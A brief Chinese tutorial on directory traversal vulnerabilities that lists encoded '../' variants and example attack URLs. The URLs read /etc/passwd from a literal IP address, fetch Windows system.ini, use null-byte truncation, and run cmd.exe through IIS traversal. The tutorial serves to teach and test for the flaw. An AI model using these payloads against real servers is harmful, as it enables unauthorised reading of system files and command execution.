目录遍历漏洞

什么是目录遍历漏洞:Directory Traversal

“目录遍历漏洞”指通过在URL或参数中构造“../”,或“../”和类似的跨父目录字符串的ASCII编码、unicode编码等,完成目录跳转,读取操作系统各个目录下的敏感文件,也可以称作“任意文件读取漏洞”。

../
..%2F
/%c0%ae%c0%ae/
%2e%2e%2f
..\
..//

目录遍历漏洞原理:程序没有充分过滤用户输入的../之类的目录跳转符,导致用户可以通过提交目录跳转来遍历服务器上的任意文件。使用多个..符号,不断向上跳转,最终停留在根/,通过绝对路径去读取任意文件。

目录遍历漏洞示例与测试
http://210.151.85.128/../../../../../../../../../etc/passwd

http://www.test.com/my.jsp?file=../../Windows/system.ini

//借助“%00”空字符截断是一个比较经典的攻击手法
http://www.test.com/my.jsp?file=../../Windows/system.ini%00.js

//使用了IIS的脚本目录来移动目录并执行指令
http://server.com/scripts/..%5c../Windows/System32/cmd.exe?/c+dir+c:\

构造url然后使用浏览器直接访问,或者使用web漏洞扫描工具检测,当然也可以自写程序测试